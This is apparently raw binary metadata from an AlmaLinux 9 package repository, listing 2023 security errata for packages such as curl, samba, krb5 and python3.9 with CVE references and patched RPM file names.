glibc-langpack-sat-2.34-60.el9_2.7.x86_64.rpm�-glibc-langpack-sq-2.34-60.el9_2.7.x86_64.rpm�Dglibc-langpack-ug-2.34-60.el9_2.7.x86_64.rpm�@glibc-langpack-ff-2.34-60.el9_2.7.x86_64.rpm�Gglibc-langpack-ur-2.34-60.el9_2.7.x86_64.rpm�Aglibc-langpack-fi-2.34-60.el9_2.7.x86_64.rpm�Mglibc-langpack-ha-2.34-60.el9_2.7.x86_64.rpm�zglibc-langpack-mi-2.34-60.el9_2.7.x86_64.rpm�(glibc-langpack-byn-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-niu-2.34-60.el9_2.7.x86_64.rpm�Hglibc-langpack-uz-2.34-60.el9_2.7.x86_64.rpm�}glibc-langpack-mk-2.34-60.el9_2.7.x86_64.rpm�Bglibc-langpack-ts-2.34-60.el9_2.7.x86_64.rpm�,glibc-2.34-60.el9_2.7.i686.rpm�
glibc-langpack-nn-2.34-60.el9_2.7.x86_64.rpm�'glibc-langpack-bs-2.34-60.el9_2.7.x86_64.rpm�"glibc-langpack-sd-2.34-60.el9_2.7.x86_64.rpm�:glibc-langpack-ti-2.34-60.el9_2.7.x86_64.rpm�4glibc-langpack-ta-2.34-60.el9_2.7.x86_64.rpm�Qglibc-langpack-yo-2.34-60.el9_2.7.x86_64.rpm�Vglibc-langpack-hu-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-anp-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-nds-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-ber-2.34-60.el9_2.7.x86_64.rpm�yglibc-langpack-mhr-2.34-60.el9_2.7.x86_64.rpm�qglibc-langpack-lo-2.34-60.el9_2.7.x86_64.rpm�oglibc-langpack-lij-2.34-60.el9_2.7.x86_64.rpm�*glibc-langpack-sl-2.34-60.el9_2.7.x86_64.rpm�Oglibc-langpack-he-2.34-60.el9_2.7.x86_64.rpm�$glibc-langpack-sgs-2.34-60.el9_2.7.x86_64.rpm�+glibc-langpack-chr-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-ps-2.34-60.el9_2.7.x86_64.rpm�aglibc-langpack-kab-2.34-60.el9_2.7.x86_64.rpm�Nglibc-langpack-hak-2.34-60.el9_2.7.x86_64.rpm�vglibc-langpack-mai-2.34-60.el9_2.7.x86_64.rpm�Tglibc-langpack-hsb-2.34-60.el9_2.7.x86_64.rpm�0glibc-langpack-csb-2.34-60.el9_2.7.x86_64.rpm�%glibc-langpack-shn-2.34-60.el9_2.7.x86_64.rpm�/glibc-langpack-ss-2.34-60.el9_2.7.x86_64.rpm�Kglibc-langpack-gu-2.34-60.el9_2.7.x86_64.rpm�;glibc-langpack-eo-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-aa-2.34-60.el9_2.7.x86_64.rpm�eglibc-langpack-kn-2.34-60.el9_2.7.x86_64.rpm�Rglibc-langpack-yue-2.34-60.el9_2.7.x86_64.rpm�glibc-langpack-nl-2.34-60.el9_2.7.x86_64.rpm�/glibc-langpack-cs-2.34-60.el9_2.7.x86_64.rpm�-glibc-langpack-cmn-2.34-60.el9_2.7.x86_64.rpm�Eglibc-langpack-fur-2.34-60.el9_2.7.x86_64.rpm�2glibc-langpack-sw-2.34-60.el9_2.7.x86_64.rpm�sglibc-langpack-lv-2.34-60.el9_2.7.x86_64.rpm�
glibc-langpack-nhn-2.34-60.el9_2.7.x86_64.rpm�?glibc-langpack-to-2.34-60.el9_2.7.x86_64.rpm�Pglibc-langpack-hi-2.34-60.el9_2.7.x86_64.rpm����&�
�#�iBBBsecurityImportant: python3.9 security update0'��|�https://access.redhat.com/errata/RHSA-2023:5462RHSA-2023:5462RHSA-2023:5462https://access.redhat.com/security/cve/CVE-2023-40217CVE-2023-40217CVE-2023-40217https://bugzilla.redhat.com/22357892235789https://errata.almalinux.org/9/ALSA-2023-5462.htmlALSA-2023:5462ALSA-2023:5462-�python3-libs-3.9.16-1.el9_2.2.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.2.i686.rpm��python3-3.9.16-1.el9_2.2.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.2.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.2.i686.rpm��python3-3.9.16-1.el9_2.2.x86_64.rpm����E��$�nBBBBBBBBsecurityImportant: curl security update0'���}https://access.redhat.com/errata/RHSA-2023:5763RHSA-2023:5763RHSA-2023:5763https://access.redhat.com/security/cve/CVE-2023-38545CVE-2023-38545CVE-2023-38545https://access.redhat.com/security/cve/CVE-2023-38546CVE-2023-38546CVE-2023-38546https://bugzilla.redhat.com/22419332241933https://bugzilla.redhat.com/22419382241938https://errata.almalinux.org/9/ALSA-2023-5763.htmlALSA-2023:5763ALSA-2023:5763�*�Icurl-minimal-7.76.1-23.el9_2.4.x86_64.rpm|�Ilibcurl-minimal-7.76.1-23.el9_2.4.i686.rpm|�Ilibcurl-minimal-7.76.1-23.el9_2.4.x86_64.rpm{�Ilibcurl-7.76.1-23.el9_2.4.x86_64.rpm�)�Icurl-7.76.1-23.el9_2.4.x86_64.rpm{�Ilibcurl-7.76.1-23.el9_2.4.i686.rpm�*�Icurl-minimal-7.76.1-23.el9_2.4.x86_64.rpm|�Ilibcurl-minimal-7.76.1-23.el9_2.4.i686.rpm|�Ilibcurl-minimal-7.76.1-23.el9_2.4.x86_64.rpm{�Ilibcurl-7.76.1-23.el9_2.4.x86_64.rpm�)�Icurl-7.76.1-23.el9_2.4.x86_64.rpm{�Ilibcurl-7.76.1-23.el9_2.4.i686.rpm����g��;�xBsecurityImportant: nghttp2 security update0'���-https://access.redhat.com/errata/RHSA-2023:5838RHSA-2023:5838RHSA-2023:5838https://access.redhat.com/security/cve/CVE-2023-44487CVE-2023-44487CVE-2023-44487https://bugzilla.redhat.com/22428032242803https://errata.almalinux.org/9/ALSA-2023-5838.htmlALSA-2023:5838ALSA-2023:5838�Z�_libnghttp2-1.43.0-5.el9_2.1.x86_64.rpm�Z�_libnghttp2-1.43.0-5.el9_2.1.i686.rpm�Z�_libnghttp2-1.43.0-5.el9_2.1.x86_64.rpm�Z�_libnghttp2-1.43.0-5.el9_2.1.i686.rpm��Ù0�
�?�|BsecurityLow: opensc security update0�9��A�(https://access.redhat.com/errata/RHSA-2023:6587RHSA-2023:6587RHSA-2023:6587https://access.redhat.com/security/cve/CVE-2023-2977CVE-2023-2977CVE-2023-2977https://bugzilla.redhat.com/22110882211088https://errata.almalinux.org/9/ALSA-2023-6587.htmlALSA-2023:6587ALSA-2023:6587�	�Topensc-0.23.0-2.el9.i686.rpm�	�Topensc-0.23.0-2.el9.x86_64.rpm�	�Topensc-0.23.0-2.el9.i686.rpm�	�Topensc-0.23.0-2.el9.x86_64.rpm������%�@BBBsecurityModerate: binutils security update0��i�Jhttps://access.redhat.com/errata/RHSA-2023:6593RHSA-2023:6593RHSA-2023:6593https://access.redhat.com/security/cve/CVE-2022-4285CVE-2022-4285CVE-2022-4285https://bugzilla.redhat.com/21507682150768https://errata.almalinux.org/9/ALSA-2023-6593.htmlALSA-2023:6593ALSA-2023:6593�&�binutils-2.35.2-42.el9.x86_64.rpm�&�binutils-2.35.2-42.el9.i686.rpm�\�binutils-gold-2.35.2-42.el9.x86_64.rpm�&�binutils-2.35.2-42.el9.x86_64.rpm�&�binutils-2.35.2-42.el9.i686.rpm�\�binutils-gold-2.35.2-42.el9.x86_64.rpm����<���EBBBBBBBBBBBBBBBsecurityImportant: linux-firmware security, bug fix, and enhancement update0'��3�https://access.redhat.com/errata/RHSA-2023:6595RHSA-2023:6595RHSA-2023:6595https://access.redhat.com/security/cve/CVE-2022-27635CVE-2022-27635CVE-2022-27635https://access.redhat.com/security/cve/CVE-2022-36351CVE-2022-36351CVE-2022-36351https://access.redhat.com/security/cve/CVE-2022-38076CVE-2022-38076CVE-2022-38076https://access.redhat.com/security/cve/CVE-2022-40964CVE-2022-40964CVE-2022-40964https://access.redhat.com/security/cve/CVE-2022-46329CVE-2022-46329CVE-2022-46329https://access.redhat.com/security/cve/CVE-2023-20569CVE-2023-20569CVE-2023-20569https://bugzilla.redhat.com/22076252207625https://bugzilla.redhat.com/22389602238960https://bugzilla.redhat.com/22389612238961https://bugzilla.redhat.com/22389622238962https://bugzilla.redhat.com/22389632238963https://bugzilla.redhat.com/22389642238964https://errata.almalinux.org/9/ALSA-2023-6595.htmlALSA-2023:6595ALSA-2023:6595�b�aiwl135-firmware-18.168.6.1-140.el9_3.noarch.rpm�m�\linux-firmware-20230814-140.el9_3.noarch.rpm�o�\netronome-firmware-20230814-140.el9_3.noarch.rpm�`�
iwl1000-firmware-39.31.5.1-140.el9_3.noarch.rpm�n�\linux-firmware-whence-20230814-140.el9_3.noarch.rpm�d�aiwl2030-firmware-18.168.6.1-140.el9_3.noarch.rpm�f�"iwl5000-firmware-8.83.5.1_1-140.el9_3.noarch.rpm�a�aiwl105-firmware-18.168.6.1-140.el9_3.noarch.rpm�_�iwl100-firmware-39.31.5.1-140.el9_3.noarch.rpm�e�Liwl3160-firmware-25.30.13.0-140.el9_3.noarch.rpm�h�aiwl6000g2a-firmware-18.168.6.1-140.el9_3.noarch.rpm�i�aiwl6000g2b-firmware-18.168.6.1-140.el9_3.noarch.rpm�c�aiwl2000-firmware-18.168.6.1-140.el9_3.noarch.rpm�l�\libertas-sd8787-firmware-20230814-140.el9_3.noarch.rpm�j�iwl6050-firmware-41.28.5.1-140.el9_3.noarch.rpm�k�Liwl7260-firmware-25.30.13.0-140.el9_3.noarch.rpm�g�iwl5150-firmware-8.24.2.2-140.el9_3.noarch.rpm�b�aiwl135-firmware-18.168.6.1-140.el9_3.noarch.rpm�m�\linux-firmware-20230814-140.el9_3.noarch.rpm�o�\netronome-firmware-20230814-140.el9_3.noarch.rpm�`�
iwl1000-firmware-39.31.5.1-140.el9_3.noarch.rpm�n�\linux-firmware-whence-20230814-140.el9_3.noarch.rpm�d�aiwl2030-firmware-18.168.6.1-140.el9_3.noarch.rpm�f�"iwl5000-firmware-8.83.5.1_1-140.el9_3.noarch.rpm�a�aiwl105-firmware-18.168.6.1-140.el9_3.noarch.rpm�_�iwl100-firmware-39.31.5.1-140.el9_3.noarch.rpm�e�Liwl3160-firmware-25.30.13.0-140.el9_3.noarch.rpm�h�aiwl6000g2a-firmware-18.168.6.1-140.el9_3.noarch.rpm�i�aiwl6000g2b-firmware-18.168.6.1-140.el9_3.noarch.rpm�c�aiwl2000-firmware-18.168.6.1-140.el9_3.noarch.rpm�l�\libertas-sd8787-firmware-20230814-140.el9_3.noarch.rpm�j�iwl6050-firmware-41.28.5.1-140.el9_3.noarch.rpm�k�Liwl7260-firmware-25.30.13.0-140.el9_3.noarch.rpm�g�iwl5150-firmware-8.24.2.2-140.el9_3.noarch.rpm����c��&�WBsecurityModerate: cups security and bug fix update0��?�nhttps://access.redhat.com/errata/RHSA-2023:6596RHSA-2023:6596RHSA-2023:6596https://access.redhat.com/security/cve/CVE-2023-32324CVE-2023-32324CVE-2023-32324https://access.redhat.com/security/cve/CVE-2023-34241CVE-2023-34241CVE-2023-34241https://bugzilla.redhat.com/22096032209603https://bugzilla.redhat.com/22149142214914https://errata.almalinux.org/9/ALSA-2023-6596.htmlALSA-2023:6596ALSA-2023:6596�+�mcups-libs-2.3.3op2-21.el9.x86_64.rpm�+�mcups-libs-2.3.3op2-21.el9.i686.rpm�+�mcups-libs-2.3.3op2-21.el9.x86_64.rpm�+�mcups-libs-2.3.3op2-21.el9.i686.rpm�������ZsecurityModerate: python-cryptography security update0��-�fhttps://access.redhat.com/errata/RHSA-2023:6615RHSA-2023:6615RHSA-2023:6615https://access.redhat.com/security/cve/CVE-2023-23931CVE-2023-23931CVE-2023-23931https://bugzilla.redhat.com/21718172171817https://errata.almalinux.org/9/ALSA-2023-6615.htmlALSA-2023:6615ALSA-2023:6615�w�.python3-cryptography-36.0.1-4.el9.x86_64.rpm�w�.python3-cryptography-36.0.1-4.el9.x86_64.rpm������ �]BsecurityModerate: protobuf-c security update0���}https://access.redhat.com/errata/RHSA-2023:6621RHSA-2023:6621RHSA-2023:6621https://access.redhat.com/security/cve/CVE-2022-48468CVE-2022-48468CVE-2022-48468https://bugzilla.redhat.com/21866732186673https://errata.almalinux.org/9/ALSA-2023-6621.htmlALSA-2023:6621ALSA-2023:6621�C�^protobuf-c-1.3.3-13.el9.x86_64.rpm�C�^protobuf-c-1.3.3-13.el9.i686.rpm�C�^protobuf-c-1.3.3-13.el9.x86_64.rpm�C�^protobuf-c-1.3.3-13.el9.i686.rpm������'�aBsecurityLow: glib2 security and bug fix update0�9���ohttps://access.redhat.com/errata/RHSA-2023:6631RHSA-2023:6631RHSA-2023:6631https://access.redhat.com/security/cve/CVE-2023-29499CVE-2023-29499CVE-2023-29499https://access.redhat.com/security/cve/CVE-2023-32611CVE-2023-32611CVE-2023-32611https://access.redhat.com/security/cve/CVE-2023-32665CVE-2023-32665CVE-2023-32665https://bugzilla.redhat.com/22118272211827https://bugzilla.redhat.com/22118282211828https://bugzilla.redhat.com/22118292211829https://errata.almalinux.org/9/ALSA-2023-6631.htmlALSA-2023:6631ALSA-2023:6631�X�|glib2-2.68.4-11.el9.x86_64.rpm�X�|glib2-2.68.4-11.el9.i686.rpm�X�|glib2-2.68.4-11.el9.x86_64.rpm�X�|glib2-2.68.4-11.el9.i686.rpm������)�dBBBsecurityLow: shadow-utils security and bug fix update0�9���Yhttps://access.redhat.com/errata/RHSA-2023:6632RHSA-2023:6632RHSA-2023:6632https://access.redhat.com/security/cve/CVE-2023-4641CVE-2023-4641CVE-2023-4641https://bugzilla.redhat.com/22159452215945https://errata.almalinux.org/9/ALSA-2023-6632.htmlALSA-2023:6632ALSA-2023:6632�~�shadow-utils-4.9-8.el9.x86_64.rpm�4�shadow-utils-subid-4.9-8.el9.i686.rpm�4�shadow-utils-subid-4.9-8.el9.x86_64.rpm�~�shadow-utils-4.9-8.el9.x86_64.rpm�4�shadow-utils-subid-4.9-8.el9.i686.rpm�4�shadow-utils-subid-4.9-8.el9.x86_64.rpm����@��(�jBsecurityModerate: c-ares security, bug fix, and enhancement update0��X�

https://access.redhat.com/errata/RHSA-2023:6635RHSA-2023:6635RHSA-2023:6635https://access.redhat.com/security/cve/CVE-2022-4904CVE-2022-4904CVE-2022-4904https://access.redhat.com/security/cve/CVE-2023-31124CVE-2023-31124CVE-2023-31124https://access.redhat.com/security/cve/CVE-2023-31130CVE-2023-31130CVE-2023-31130https://access.redhat.com/security/cve/CVE-2023-31147CVE-2023-31147CVE-2023-31147https://bugzilla.redhat.com/21686312168631https://bugzilla.redhat.com/22094942209494https://bugzilla.redhat.com/22094972209497https://bugzilla.redhat.com/22095012209501https://errata.almalinux.org/9/ALSA-2023-6635.htmlALSA-2023:6635ALSA-2023:6635��[c-ares-1.19.1-1.el9.i686.rpm��[c-ares-1.19.1-1.el9.x86_64.rpm��[c-ares-1.19.1-1.el9.i686.rpm��[c-ares-1.19.1-1.el9.x86_64.rpm������)�mBBsecurityModerate: libssh security update0��b�{https://access.redhat.com/errata/RHSA-2023:6643RHSA-2023:6643RHSA-2023:6643https://access.redhat.com/security/cve/CVE-2023-1667CVE-2023-1667CVE-2023-1667https://access.redhat.com/security/cve/CVE-2023-2283CVE-2023-2283CVE-2023-2283https://bugzilla.redhat.com/21821992182199https://bugzilla.redhat.com/21897362189736https://errata.almalinux.org/9/ALSA-2023-6643.htmlALSA-2023:6643ALSA-2023:6643�A�6libssh-0.10.4-11.el9.i686.rpm��6libssh-config-0.10.4-11.el9.noarch.rpm�A�6libssh-0.10.4-11.el9.x86_64.rpm�A�6libssh-0.10.4-11.el9.i686.rpm��6libssh-config-0.10.4-11.el9.noarch.rpm�A�6libssh-0.10.4-11.el9.x86_64.rpm����X��*�qBBBsecurityModerate: python3.9 security update0��]� https://access.redhat.com/errata/RHSA-2023:6659RHSA-2023:6659RHSA-2023:6659https://access.redhat.com/security/cve/CVE-2007-4559CVE-2007-4559CVE-2007-4559https://bugzilla.redhat.com/263261263261https://errata.almalinux.org/9/ALSA-2023-6659.htmlALSA-2023:6659ALSA-2023:6659-�python3-libs-3.9.18-1.el9_3.i686.rpm��python3-3.9.18-1.el9_3.x86_64.rpm-�python3-libs-3.9.18-1.el9_3.x86_64.rpm-�python3-libs-3.9.18-1.el9_3.i686.rpm��python3-3.9.18-1.el9_3.x86_64.rpm-�python3-libs-3.9.18-1.el9_3.x86_64.rpm����B��+�vBsecurityLow: gmp security and enhancement update0�9��}�Uhttps://access.redhat.com/errata/RHSA-2023:6661RHSA-2023:6661RHSA-2023:6661https://access.redhat.com/security/cve/CVE-2021-43618CVE-2021-43618CVE-2021-43618https://bugzilla.redhat.com/20249042024904https://errata.almalinux.org/9/ALSA-2023-6661.htmlALSA-2023:6661ALSA-2023:6661�)�rgmp-6.2.0-13.el9.x86_64.rpm�)�rgmp-6.2.0-13.el9.i686.rpm�)�rgmp-6.2.0-13.el9.x86_64.rpm�)�rgmp-6.2.0-13.el9.i686.rpm����B��,�yBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: samba security, bug fix, and enhancement update0��R�K
https://access.redhat.com/errata/RHSA-2023:6667RHSA-2023:6667RHSA-2023:6667https://access.redhat.com/security/cve/CVE-2022-2127CVE-2022-2127CVE-2022-2127https://access.redhat.com/security/cve/CVE-2023-34966CVE-2023-34966CVE-2023-34966https://access.redhat.com/security/cve/CVE-2023-34967CVE-2023-34967CVE-2023-34967https://access.redhat.com/security/cve/CVE-2023-34968CVE-2023-34968CVE-2023-34968https://bugzilla.redhat.com/22227912222791https://bugzilla.redhat.com/22227932222793https://bugzilla.redhat.com/22227942222794https://bugzilla.redhat.com/22227952222795https://errata.almalinux.org/9/ALSA-2023-6667.htmlALSA-2023:6667ALSA-2023:6667�X*samba-4.18.6-100.el9.x86_64.rpm�Y*samba-common-tools-4.18.6-100.el9.x86_64.rpm�6*samba-winbind-modules-4.18.6-100.el9.i686.rpm�3*samba-client-libs-4.18.6-100.el9.x86_64.rpm�3*samba-client-libs-4.18.6-100.el9.i686.rpm�Z*samba-winbind-4.18.6-100.el9.x86_64.rpm�4*samba-common-libs-4.18.6-100.el9.i686.rpm�0*libsmbclient-4.18.6-100.el9.i686.rpm�Y*libnetapi-4.18.6-100.el9.x86_64.rpm�0*libsmbclient-4.18.6-100.el9.x86_64.rpm�<*python3-samba-dc-4.18.6-100.el9.x86_64.rpm�5*samba-libs-4.18.6-100.el9.x86_64.rpm�?*samba-ldb-ldap-modules-4.18.6-100.el9.x86_64.rpm�2*python3-samba-4.18.6-100.el9.x86_64.rpm�1*libwbclient-4.18.6-100.el9.i686.rpm�>*samba-dcerpc-4.18.6-100.el9.x86_64.rpm�1*libwbclient-4.18.6-100.el9.x86_64.rpm�5*samba-libs-4.18.6-100.el9.i686.rpm�A*samba-usershares-4.18.6-100.el9.x86_64.rpm�6*samba-winbind-modules-4.18.6-100.el9.x86_64.rpm�2*python3-samba-4.18.6-100.el9.i686.rpm�[*samba-dc-libs-4.18.6-100.el9.x86_64.rpm�@*samba-tools-4.18.6-100.el9.x86_64.rpm�[*samba-dc-libs-4.18.6-100.el9.i686.rpm�4*samba-common-libs-4.18.6-100.el9.x86_64.rpm�Y*libnetapi-4.18.6-100.el9.i686.rpm�u*samba-common-4.18.6-100.el9.noarch.rpm�X*samba-4.18.6-100.el9.x86_64.rpm�Y*samba-common-tools-4.18.6-100.el9.x86_64.rpm�6*samba-winbind-modules-4.18.6-100.el9.i686.rpm�3*samba-client-libs-4.18.6-100.el9.x86_64.rpm�3*samba-client-libs-4.18.6-100.el9.i686.rpm�Z*samba-winbind-4.18.6-100.el9.x86_64.rpm�4*samba-common-libs-4.18.6-100.el9.i686.rpm�0*libsmbclient-4.18.6-100.el9.i686.rpm�Y*libnetapi-4.18.6-100.el9.x86_64.rpm�0*libsmbclient-4.18.6-100.el9.x86_64.rpm�<*python3-samba-dc-4.18.6-100.el9.x86_64.rpm�5*samba-libs-4.18.6-100.el9.x86_64.rpm�?*samba-ldb-ldap-modules-4.18.6-100.el9.x86_64.rpm�2*python3-samba-4.18.6-100.el9.x86_64.rpm�1*libwbclient-4.18.6-100.el9.i686.rpm�>*samba-dcerpc-4.18.6-100.el9.x86_64.rpm�1*libwbclient-4.18.6-100.el9.x86_64.rpm�5*samba-libs-4.18.6-100.el9.i686.rpm�A*samba-usershares-4.18.6-100.el9.x86_64.rpm�6*samba-winbind-modules-4.18.6-100.el9.x86_64.rpm�2*python3-samba-4.18.6-100.el9.i686.rpm�[*samba-dc-libs-4.18.6-100.el9.x86_64.rpm�@*samba-tools-4.18.6-100.el9.x86_64.rpm�[*samba-dc-libs-4.18.6-100.el9.i686.rpm�4*samba-common-libs-4.18.6-100.el9.x86_64.rpm�Y*libnetapi-4.18.6-100.el9.i686.rpm�u*samba-common-4.18.6-100.el9.noarch.rpm����8��-�eBBBBBBBBsecurityModerate: curl security update0���q
https://access.redhat.com/errata/RHSA-2023:6679RHSA-2023:6679RHSA-2023:6679https://access.redhat.com/security/cve/CVE-2023-27533CVE-2023-27533CVE-2023-27533https://access.redhat.com/security/cve/CVE-2023-27534CVE-2023-27534CVE-2023-27534https://access.redhat.com/security/cve/CVE-2023-27536CVE-2023-27536CVE-2023-27536https://access.redhat.com/security/cve/CVE-2023-27538CVE-2023-27538CVE-2023-27538https://bugzilla.redhat.com/21790622179062https://bugzilla.redhat.com/21790692179069https://bugzilla.redhat.com/21790922179092https://bugzilla.redhat.com/21791032179103https://errata.almalinux.org/9/ALSA-2023-6679.htmlALSA-2023:6679ALSA-2023:6679{�Jlibcurl-7.76.1-26.el9.x86_64.rpm|�Jlibcurl-minimal-7.76.1-26.el9.i686.rpm�*�Jcurl-minimal-7.76.1-26.el9.x86_64.rpm{�Jlibcurl-7.76.1-26.el9.i686.rpm�)�Jcurl-7.76.1-26.el9.x86_64.rpm|�Jlibcurl-minimal-7.76.1-26.el9.x86_64.rpm{�Jlibcurl-7.76.1-26.el9.x86_64.rpm|�Jlibcurl-minimal-7.76.1-26.el9.i686.rpm�*�Jcurl-minimal-7.76.1-26.el9.x86_64.rpm{�Jlibcurl-7.76.1-26.el9.i686.rpm�)�Jcurl-7.76.1-26.el9.x86_64.rpm|�Jlibcurl-minimal-7.76.1-26.el9.x86_64.rpm����Y��2�oBsecurityLow: tpm2-tss security and enhancement update0�9���Rhttps://access.redhat.com/errata/RHSA-2023:6685RHSA-2023:6685RHSA-2023:6685https://access.redhat.com/security/cve/CVE-2023-22745CVE-2023-22745CVE-2023-22745https://bugzilla.redhat.com/21626102162610https://errata.almalinux.org/9/ALSA-2023-6685.htmlALSA-2023:6685ALSA-2023:6685�I�tpm2-tss-3.2.2-2.el9.i686.rpm�I�tpm2-tss-3.2.2-2.el9.x86_64.rpm�I�tpm2-tss-3.2.2-2.el9.i686.rpm�I�tpm2-tss-3.2.2-2.el9.x86_64.rpm���� ��.�3securityModerate: python-pip security update0��`�(https://access.redhat.com/errata/RHSA-2023:6694RHSA-2023:6694RHSA-2023:6694https://access.redhat.com/security/cve/CVE-2007-4559CVE-2007-4559CVE-2007-4559https://bugzilla.redhat.com/263261263261https://errata.almalinux.org/9/ALSA-2023-6694.htmlALSA-2023:6694ALSA-2023:6694�)�python3-pip-wheel-21.2.3-7.el9.noarch.rpm�)�python3-pip-wheel-21.2.3-7.el9.noarch.rpm����C��/�tBBBBsecurityModerate: ncurses security and bug fix update0���xhttps://access.redhat.com/errata/RHSA-2023:6698RHSA-2023:6698RHSA-2023:6698https://access.redhat.com/security/cve/CVE-2023-29491CVE-2023-29491CVE-2023-29491https://bugzilla.redhat.com/21917042191704https://errata.almalinux.org/9/ALSA-2023-6698.htmlALSA-2023:6698ALSA-2023:6698�g�
ncurses-6.2-10.20210508.el9.x86_64.rpm�A�
ncurses-libs-6.2-10.20210508.el9.i686.rpm�A�
ncurses-libs-6.2-10.20210508.el9.x86_64.rpm�%�
ncurses-base-6.2-10.20210508.el9.noarch.rpm�g�
ncurses-6.2-10.20210508.el9.x86_64.rpm�A�
ncurses-libs-6.2-10.20210508.el9.i686.rpm�A�
ncurses-libs-6.2-10.20210508.el9.x86_64.rpm�%�
ncurses-base-6.2-10.20210508.el9.noarch.rpm����b��0�zBBBBBBBBBBBBBBBsecurityModerate: krb5 security and bug fix update0���9https://access.redhat.com/errata/RHSA-2023:6699RHSA-2023:6699RHSA-2023:6699https://access.redhat.com/security/cve/CVE-2023-36054CVE-2023-36054CVE-2023-36054https://access.redhat.com/security/cve/CVE-2023-39975CVE-2023-39975CVE-2023-39975https://bugzilla.redhat.com/22301782230178https://bugzilla.redhat.com/22326822232682https://errata.almalinux.org/9/ALSA-2023-6699.htmlALSA-2023:6699ALSA-2023:6699�$�krb5-libs-1.21.1-1.el9.i686.rpm�(�libkadm5-1.21.1-1.el9.i686.rpm�%�krb5-pkinit-1.21.1-1.el9.i686.rpm�'�krb5-server-ldap-1.21.1-1.el9.i686.rpm�(�libkadm5-1.21.1-1.el9.x86_64.rpm�&�krb5-server-1.21.1-1.el9.x86_64.rpm�&�krb5-server-1.21.1-1.el9.i686.rpm�$�krb5-libs-1.21.1-1.el9.x86_64.rpm�p�krb5-workstation-1.21.1-1.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-1.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-1.el9.x86_64.rpm�$�krb5-libs-1.21.1-1.el9.i686.rpm�(�libkadm5-1.21.1-1.el9.i686.rpm�%�krb5-pkinit-1.21.1-1.el9.i686.rpm�'�krb5-server-ldap-1.21.1-1.el9.i686.rpm�(�libkadm5-1.21.1-1.el9.x86_64.rpm�&�krb5-server-1.21.1-1.el9.x86_64.rpm�&�krb5-server-1.21.1-1.el9.i686.rpm�$�krb5-libs-1.21.1-1.el9.x86_64.rpm�p�krb5-workstation-1.21.1-1.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-1.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-1.el9.x86_64.rpm����u���KBBsecurityLow: procps-ng security and bug fix update0�9��9�Hhttps://access.redhat.com/errata/RHSA-2023:6705RHSA-2023:6705RHSA-2023:6705https://access.redhat.com/security/cve/CVE-2023-4016CVE-2023-4016CVE-2023-4016https://bugzilla.redhat.com/22284942228494https://errata.almalinux.org/9/ALSA-2023-6705.htmlALSA-2023:6705ALSA-2023:6705�B�;procps-ng-3.3.17-13.el9.x86_64.rpm�&�;procps-ng-i18n-3.3.17-13.el9.noarch.rpm�B�;procps-ng-3.3.17-13.el9.i686.rpm�B�;procps-ng-3.3.17-13.el9.x86_64.rpm�&�;procps-ng-i18n-3.3.17-13.el9.noarch.rpm�B�;procps-ng-3.3.17-13.el9.i686.rpm����Z� �1�PBBBBsecurityModerate: avahi security update0���https://access.redhat.com/errata/RHSA-2023:6707RHSA-2023:6707RHSA-2023:6707https://access.redhat.com/security/cve/CVE-2021-3468CVE-2021-3468CVE-2021-3468https://access.redhat.com/security/cve/CVE-2021-3502CVE-2021-3502CVE-2021-3502https://access.redhat.com/security/cve/CVE-2023-1981CVE-2023-1981CVE-2023-1981https://bugzilla.redhat.com/19396141939614https://bugzilla.redhat.com/19469141946914https://bugzilla.redhat.com/21859112185911https://errata.almalinux.org/9/ALSA-2023-6707.htmlALSA-2023:6707ALSA-2023:6707��
avahi-libs-0.8-15.el9.i686.rpm��
avahi-0.8-15.el9.i686.rpm��
avahi-0.8-15.el9.x86_64.rpm��
avahi-libs-0.8-15.el9.x86_64.rpm��
avahi-libs-0.8-15.el9.i686.rpm��
avahi-0.8-15.el9.i686.rpm��
avahi-0.8-15.el9.x86_64.rpm��
avahi-libs-0.8-15.el9.x86_64.rpm����h�!�2�VBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: samba security update0���Yhttps://access.redhat.com/errata/RHSA-2023:6744RHSA-2023:6744RHSA-2023:6744https://access.redhat.com/security/cve/CVE-2023-3961CVE-2023-3961CVE-2023-3961https://access.redhat.com/security/cve/CVE-2023-4091CVE-2023-4091CVE-2023-4091https://access.redhat.com/security/cve/CVE-2023-42669CVE-2023-42669CVE-2023-42669https://bugzilla.redhat.com/22418812241881https://bugzilla.redhat.com/22418822241882https://bugzilla.redhat.com/22418842241884https://errata.almalinux.org/9/ALSA-2023-6744.htmlALSA-2023:6744ALSA-2023:6744�>+samba-dcerpc-4.18.6-101.el9_3.alma.1.x86_64.rpm�3+samba-client-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�1+libwbclient-4.18.6-101.el9_3.alma.1.i686.rpm�[+samba-dc-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�0+libsmbclient-4.18.6-101.el9_3.alma.1.i686.rpm�Y+libnetapi-4.18.6-101.el9_3.alma.1.i686.rpm�A+samba-usershares-4.18.6-101.el9_3.alma.1.x86_64.rpm�6+samba-winbind-modules-4.18.6-101.el9_3.alma.1.x86_64.rpm�1+libwbclient-4.18.6-101.el9_3.alma.1.x86_64.rpm�3+samba-client-libs-4.18.6-101.el9_3.alma.1.i686.rpm�5+samba-libs-4.18.6-101.el9_3.alma.1.i686.rpm�4+samba-common-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�?+samba-ldb-ldap-modules-4.18.6-101.el9_3.alma.1.x86_64.rpm�5+samba-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�2+